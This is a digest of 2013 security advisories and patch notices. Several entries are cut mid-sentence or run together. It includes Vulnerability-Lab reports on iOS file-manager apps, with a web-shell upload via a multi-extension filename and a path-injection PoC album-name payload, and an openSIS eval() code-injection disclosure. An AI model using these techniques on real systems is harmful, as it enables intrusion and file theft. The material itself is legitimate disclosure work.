Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities
Document Title: === Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1160 Release Date: = 2013-12-03 Vulnerability Laboratory ID (VL-ID): 1160 Common Vulnerability Scoring System: 8.9 Product Service Introduction: === iFiles is the most intuitive file manager for iOS with features like connectivity to many file cloud services, transferring files between computer or cloud services, ability to view many file formats (PDF viewer now supports annotations, search and more), voice recorder, web downloader, text file editor and more. Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, Box.net, SkyDrive, SugarSync, AFP (Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, CloudApp, PogoPlug, WebDav, Amazon S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and UltiCloud. ( Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 http://imagam.com ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Imagam iFiles v1.16.0 mobile application for apple iOS. Vulnerability Disclosure Timeline: == 2013-12-03:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Imagam Product: iFiles - Mobile Application iOS 1.16.0 Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: 1.1 A file include- arbitrary file upload web vulnerability has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS. An arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access. A file include web vulnerability allows a remote attacker to unauthorized include local web-server file requests or external file requests. The vulnerability is located in the vulnerable file- and folder-name value. Remote attackers can include local file requests combined with script code to successful exploit the issue. To include to the vulnerable foldername value it is required to manipulate the `create folder` (add) input (POST Method). The secound possibility to inject is the vulnerable filename value of the misconfigured (POST Method) upload module. After the include the remote attacker can access the included file by requesting the regular index or sub category folder (web interface) site. The arbitrary file upload vulnerability is located in the vulnerable filename value of the upload module. Attackers are also able to upload a php or js web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension test.jpg.html.js.php.gif.jpg . After the upload the attacker opens the file in the web application to delete the .gif.jpg file extension to access the resource with elevated execution access rights. Exploitation of the file include arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Request Method(s): [+] [POST] Vulnerable Module(s): [+] File Upload Vulnerable Parameter(s): [+] filename (value) - (multiple extensions) [+] foldername Affected Module(s): [+] File Folder Dir Listing (http://localhost:8080) 1.2 2 local command/path injection web vulnerabilities has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS. The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. The vulnerability is located in the in the device name value of the file dir und sub category listing module. Local attackers are able to inject own malicious system specific commands or path values requests as the iOS device name. The execute of the injected script code occurs in two different section with persistent attack vector. The first section is the wifi app web-interface index file/folder dir listing. The secound execute occurs in the file/folder sub category listing. The security risk of the local command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of
[SECURITY] [DSA 2809-1] ruby1.8 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2809-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso December 04, 2013 http://www.debian.org/security/faq - - Package: ruby1.8 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-1821 CVE-2013-4073 CVE-2013-4164 Debian Bug : 702526 714541 730189 Several vulnerabilities have been discovered in the interpreter for the Ruby language. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2013-1821 Ben Murphy discovered that unrestricted entity expansion in REXML can lead to a Denial of Service by consuming all host memory. CVE-2013-4073 William (B.J.) Snow Orvis discovered a vulnerability in the hostname checking in Ruby's SSL client that could allow man-in-the-middle attackers to spoof SSL servers via a crafted certificate issued by a trusted certification authority. CVE-2013-4164 Charlie Somerville discovered that Ruby incorrectly handled floating point number conversion. If an application using Ruby accepted untrusted input strings and converted them to floating point numbers, an attacker able to provide such input could cause the application to crash or, possibly, execute arbitrary code with the privileges of the application. For the oldstable distribution (squeeze), these problems have been fixed in version 1.8.7.302-2squeeze2. For the stable distribution (wheezy), these problems have been fixed in version 1.8.7.358-7.1+deb7u1. For the unstable distribution (sid), these problems have been fixed in version 1.8.7.358-9. We recommend that you upgrade your ruby1.8 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAEBCgAGBQJSn55AAAoJEAVMuPMTQ89EKpcP/ROwTK5keLHdzpwMu5DXCanq vkOWJ3ccPC+Dn5Iz8Fe1i6TtB+XxeF5ZLtmJ6WzANKTuEbteJOXyYBpYwxn0KVp2 dONlNbpfcb0MjyVb+mSCiBzT/VAx3WyODqWNCz5H/yChp5OtOIFqOcRJd8THjqIR uzzqpu0nvD2h8kR/jKD696liO8izHDfJOYbhpAHXqyUpCqA5kxtlHZFO3nVDPr4y e3qVNQ15rCJ77NcUocaLffDAgbcTUeMcQLmYg1EHjX767wqpzMCeZEwsf4jK4iAc J+pmQSpc3dokq8OCRUtgteSbkHkvxR9MkjoSP87R4/SuywoYkDbcUfQSQ8Hav73J T/l/MXU25fpcChopxfET52ZBT/Qt5K1i74EyXAl6B3sX1LhpzPqbpvFEr8rQhcU3 flEhgCaPc10q2v7pg8UvttVGkmJ8nwNxnbjmTnzbZAY1RqhcUK9qo/xG1T/EJopj 1WIDgOdg88v+YkRrdOOZwRkzOiZLS2wbltgEs6tecMyxP79+zzsoxs1uzKQz4I+H Y+ie9PS2xp8zf1x6VXlMoZRXWhdiY1rm7t3QXJNuQBCvDAPxEUwJEf6FK7d9QzY5 VkLtng309vQiZ2CUwADOglBpMyaSVPMs/GlPoUVd75mb0N5SNJksmLxAOKhs1WRc n2j7oQpxX5W0l0N7WV7q =VeHD -END PGP SIGNATURE-
[SECURITY] [DSA 2810-1] ruby1.9.1 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2810-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso December 04, 2013 http://www.debian.org/security/faq - - Package: ruby1.9.1 Vulnerability : heap overflow Problem type : remote Debian-specific: no CVE ID : CVE-2013-4164 Debian Bug : 730178 Charlie Somerville discovered that Ruby incorrectly handled floating point number conversion. If an application using Ruby accepted untrusted input strings and converted them to floating point numbers, an attacker able to provide such input could cause the application to crash or, possibly, execute arbitrary code with the privileges of the application. For the oldstable distribution (squeeze), this problem has been fixed in version 1.9.2.0-2+deb6u2. For the stable distribution (wheezy), this problem has been fixed in version 1.9.3.194-8.1+deb7u2. For the unstable distribution (sid), this problem has been fixed in version 1.9.3.484-1. We recommend that you upgrade your ruby1.9.1 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAEBCgAGBQJSn6paAAoJEAVMuPMTQ89EppAP/3gJqyFH2O8X54DRK9kWPegb Y02HT+HhDvCIxTRsMZFndelL2Q5ATvajMfygBxIGhp/Um72uoS6SvSX1qsB2KM+o wWG2L/NeuV9x2QlJIoMpAC1BFSMHSUz+s1/DypkaoXyM0NaczLHxqOBHTc8OcGM5 8o+TfalFNBvwiJB9JpSqODMZqRVJwLISHtm8d5PTIqwJ+s4NRq9q+URZzWLArSmI bne2ZX/I7ZJF5bljMfS2DybSZiGd0EOY7j1Wh9FMQOBFWcaGC7LtAKL/GixHs6aq 2ac0sWFd0osQdMlmQ4raTkeP9wqmxxA6r8t1IGvBQskn0wpwP49PA3ZbsWWW7M3F qwnIuRen+Qqpr5K0rcmB4NUmTSbC9CRYeRVlgulJHOQk3H+RDOCMtyr61Pb4yA0+ U9Cb6iytERXqz6gXve4CNX8HgojTj8UF+RwELmh6c8oOp4bawvW/43iZDjkyyPyL EE7rXAraEaHGa94kkfPO0ijLQB9jcPJOECatNtj62FYEgmAIDxBNnEfWxGgXFC1p jxvUmLbliVMQ7RnWDkrtthnm/7zS9iHZ9/JAhVbKwITxlCvZGjG84Iaofb5UW+wR nZw5lL6YydwrXPJoj0ZpWrPobMSZ/aATp0kiS5IJdLTwyZqoapVRXCZHhOmbyeh4 J2FfysOY3Wmx7cLiM6Bb =5fWg -END PGP SIGNATURE-
Sonicwall GMS v7.x - Filter Bypass Persistent Vulnerability (0Day)
Document Title: === Sonicwall GMS v7.x - Filter Bypass Persistent Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1099 Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf Release Date: = 2013-12-05 Vulnerability Laboratory ID (VL-ID): 1099 Common Vulnerability Scoring System: 4.1 Product Service Introduction: === Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs. The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service providers that have either single-site or distributed multi-site environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application. Vulnerability Disclosure Timeline: == 2013-09-26: Researcher Notification Coordination (Benjamin Kunz Mejri) 2013-09-27: Vendor Notification (DELL SonicWall Security Team) 2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team) 2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team) 2013-12-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): DELL SonicWall Product: GMS Networks Appliance Application 7.1 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: A persistent input validation web vulnerability has been discovered in the official DELL SonicWall GMS v7.1.x Appliance Web-Application. The bug allows an attacker (remote) to implement/inject own malicious malicious script codes on the application-side (persistent). The persistent vulnerability is located in the `valfield_1` `value_1` value parameters of the `Alert Settings` module POST method request. Remote attackers with low privileged application user account can inject own script codes to the POST method request of the createNewThreshold.jsp appliance application file. After the inject the attacker is able to update and save the values to continue with the execute the main alert settings module. The execute of the script code occurs in the ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable values. To bypass the filter it is required to split the request by attaching a double frame for the script code execute. The restricted application itself disallows the POST request of guest by usage of the unrestricted context POST method request attackers are able to bypass the filter exception-handling. The security risk of the persistent input validation web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 4.1(+). The coordinated disclosure procedure of the remote vulnerability has been navigated by the product manager Wilson Lee (DELL). The hotfix and information has been provided in cooperation with the vulnerability-laboratory. Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged (guest) web application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
Document Title: === Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1152 Release Date: = 2013-12-04 Vulnerability Laboratory ID (VL-ID): 1152 Common Vulnerability Scoring System: 6.7 Product Service Introduction: === Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone, from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your devices under the same Wi-Fi network. (Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 http://www.wirelesstransferapp.com/ ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS. Vulnerability Disclosure Timeline: == 2012-11-30: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Wireless Transfer App COM Product: Wireless Transfer App 3.7 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS. The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application. The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module. Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected command/path request occurs in the album sub category list and the main album name index list. The security risk of the command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-). Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific commands or unauthorized path requests. Vulnerable Application(s): [+] Wireless Transfer App v3.7 Vulnerable Parameter(s): [+] album name [+] photoGallery_head - album Affected Module(s): [+] Index - Album Name List [+] Sub Category - Title Album Name List Proof of Concept (PoC): === The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below. Manual steps to exploit the vulnerability ... 1. Install the wireless transfer v3.7 iOS mobile application 2. Open the default Photo app of your iOS device 3. Include an album with the following payload `%20x src=\..\../var/mobile/Library/[x application path]` and save it 4. Switch back to the installed wireless transfer app and start the wifi transfer 5. Open the local web-server url http://localhost:6688/ (default link) 6. The local path/command execute occurs in the album name value of the photoGallery_head class 7. Successful reproduce of the vulnerability! PoC: Album Name - photoGallery_head in the Album Sub Category List div class=header div class=logo a href=index.htmlimg src=images/logo.png alt=logo/a /div div class=titlea href=index.htmlimg src=images/title4.png alt=logo/a/div div class=buttona href=upload.htmlimg src=images/anniuda2.png alt= /a/div div class=photoGallery_head div class=phga_hd_leftAlbum : %20x src=\..\../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]/div div class=phga_hd_right input value=Zurück zur Sammlung class=back type=button /div /div /div PoC: Album Name - photoalbum in the Album Index List div class=photo_list dldt class=photoalbum alt=D579B80C-B73D-4A16-9379-FB29A6CFC12Ca href=albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C img src=/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg height=100 width=100/a/dt dd%20x
[KIS-2013-10] openSIS = 5.2 (ajax.php) PHP Code Injection Vulnerability
--
openSIS = 5.2 (ajax.php) PHP Code Injection Vulnerability
--
[-] Software Link:
http://www.opensis.com/
[-] Affected Versions:
All versions from 4.5 to 5.2.
[-] Vulnerability Description:
The vulnerable code is located in the /ajax.php script:
86. if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
87. {
88. if($_REQUEST['_openSIS_PDF']=='true')
89. ob_start();
90. if(strpos($_REQUEST['modname'],'?')!==false)
91. {
92. $vars =
substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
93. $modname =
substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
94.
95. $vars = explode('?',$vars);
96. foreach($vars as $code)
97. {
98.$code =
decode_unicode_url(\$_REQUEST['.str_replace('=',']=',$code).';);
99. eval($code);
100.}
101.}
User input passed through the modname request variable is not
properly sanitized before being used in
a call to the eval() function at line 99. This can be exploited to
inject and execute arbitrary PHP code.
[-] Solution:
As of December 5th, 2013 the only solution is this patch:
http://sourceforge.net/p/opensis-ce/code/1009
[-] Disclosure Timeline:
[04/12/2012] - Issue reported to http://sourceforge.net/p/opensis-ce/bugs/59/
[28/12/2012] - Vendor contacted, replied that the next version will
fix the issue
[12/01/2013] - CVE number requested
[14/01/2013] - CVE number assigned
[26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
[12/05/2013] - Vendor contacted again
[15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
[04/12/2013] - After one year still no official solution available
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1349 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-10
NEW VMSA-2013-0015 VMware ESX updates to third party libraries
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VMware Security Advisory Advisory ID: VMSA-2013-0015 Synopsis: VMware ESX updates to third party libraries Issue date: 2013-12-05 Updated on: 2013-12-05 (initial release) CVE numbers: --- kernel (service console) --- CVE-2012-2372, CVE-2012-3552, CVE-2013-2147, CVE-2013-2164, CVE-2013-2206, CVE-2013-2224, CVE-2013-2234, CVE-2013-2237, CVE-2013-2232 --- nss and nspr (service console) --- CVE-2013-0791, CVE-2013-1620 - - 1. Summary VMware has updated several third party libraries in ESX that address multiple security vulnerabilities. 2. Relevant releases VMware ESX 4.1 without patch ESX410-201312001 3. Problem Description a. Update to ESX service console kernel The ESX service console kernel is updated to resolve multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2012-2372, CVE-2012-3552, CVE-2013-2147, CVE-2013-2164, CVE-2013-2206, CVE-2013-2224, CVE-2013-2234, CVE-2013-2237, CVE-2013-2232 to these issues. VMware Product Running Replace with/ Product Version on Apply Patch == === = ESXiany ESXi not applicable ESX 4.1 ESX ESX410-201312401-SG ESX 4.0 ESX patch pending b. Update to ESX service console NSPR and NSS This patch updates the ESX service console Netscape Portable Runtime (NSPR) and Network Security Services (NSS) RPMs to resolve multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2013-0791 and CVE-2013-1620 to these issues. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch == === = ESXiany ESXi not applicable ESX 4.1 ESX ESX410-201312403-SG ESX 4.0 ESX patch pending 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. ESX 4.1 --- File: ESX410-201312001.zip md5sum: c35763a84db169dd0285442d4129cc18 sha1sum: ee8e1b8d2d383422ff0dde04749c5d89e77d8e40 http://kb.vmware.com/kb/2061209 ESX410-201312001 contains ESX410-201312401-SG and ESX410-201312403-SG. 5. References --- kernel (service console) --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2372 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3552 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2147 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2164 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2234 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2237 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2232 --- NSPR and NSS (service console) --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620 - - 6. Change log 2013-12-05 VMSA-2013-0015 Initial security advisory in conjunction with the release of ESX 4.1 patches on 2013-12-05. - - 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2013 VMware Inc. All rights reserved. -BEGIN PGP SIGNATURE- Comment: GPGTools - https://gpgtools.org iEYEARECAAYFAlKhXU4ACgkQDEcm8Vbi9kNX/gCg14tA1XgGuYp9bm2UFjec9I/Z FIEAn0TKmueBwb03NQ1ZMkayBgrrTrz1 =9TBm
[slackware-security] mozilla-nss (SSA:2013-339-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] mozilla-nss (SSA:2013-339-01) New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz: Upgraded. This update contains security fixes and improvements. For more information, see: http://www.mozilla.org/security/announce/2013/mfsa2013-103.html (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/mozilla-nss-3.15.3-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/mozilla-nss-3.15.3-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 package: c5d7e5b5b46bedae785d22d0247d70ad mozilla-nss-3.15.3-i486-1_slack14.0.txz Slackware x86_64 14.0 package: f29e0973d99829c08038193b65b5b4b3 mozilla-nss-3.15.3-x86_64-1_slack14.0.txz Slackware 14.1 package: 9f95b21dc109db67f8e7906521bab61b mozilla-nss-3.15.3-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 9f853af467fe81e70bf820677b45c4ad mozilla-nss-3.15.3-x86_64-1_slack14.1.txz Slackware -current package: e90376f0a0b99c8924ddb39d27775e8c l/mozilla-nss-3.15.3-i486-1.txz Slackware x86_64 -current package: 95bfee53e035ae57557e150788b83290 l/mozilla-nss-3.15.3-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg mozilla-nss-3.15.3-i486-1_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlKhGKoACgkQakRjwEAQIjMw8QCggSmImM4YAHsr+e8hI0lbJWh3 XDUAn0SdI1Tq9BYeICGQ4noDkypcGIRm =d02G -END PGP SIGNATURE-
[slackware-security] mozilla-thunderbird (SSA:2013-339-02)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] mozilla-thunderbird (SSA:2013-339-02) New mozilla-thunderbird packages are available for Slackware 13.37, 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz: Upgraded. This release contains security fixes and improvements. For more information, see: http://www.mozilla.org/security/known-vulnerabilities/thunderbird.html (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-24.1.1-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-24.1.1-x86_64-1.txz MD5 signatures: +-+ Slackware 13.37 package: 4c7fe2a313a7b98c8a33f1c6d0c953ad mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 1f33fbe3e18e0fbaf1190569fb9f8b9e mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz Slackware 14.0 package: 8c2c55219d568e4cff9eda91b883f658 mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz Slackware x86_64 14.0 package: b254f06d541562be63511312118400a4 mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz Slackware 14.1 package: 50fbdd06e503a5220e130927ae0e9171 mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz Slackware x86_64 14.1 package: eb7196ac604d9fba90b8f71bc29ae0f9 mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz Slackware -current package: 4d2efed242da82ead7a3c19d19000aaa xap/mozilla-thunderbird-24.1.1-i486-1.txz Slackware x86_64 -current package: 7c40c6f86cec219dee61370fb1bfe007 xap/mozilla-thunderbird-24.1.1-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlKhGKwACgkQakRjwEAQIjPqqwCfbBsfXUQLQyE20YRaXGx+Dr9+ JuwAoIP/KrWPV1sUiBvmC1ReMcMIbBWm =o4// -END PGP SIGNATURE-
[slackware-security] seamonkey (SSA:2013-339-03)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] seamonkey (SSA:2013-339-03) New seamonkey packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz: Upgraded. This update contains security fixes and improvements. For more information, see: http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html (* Security fix *) patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz: Upgraded. +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.22.1-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.0.txz Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.22.1-i486-1.txz 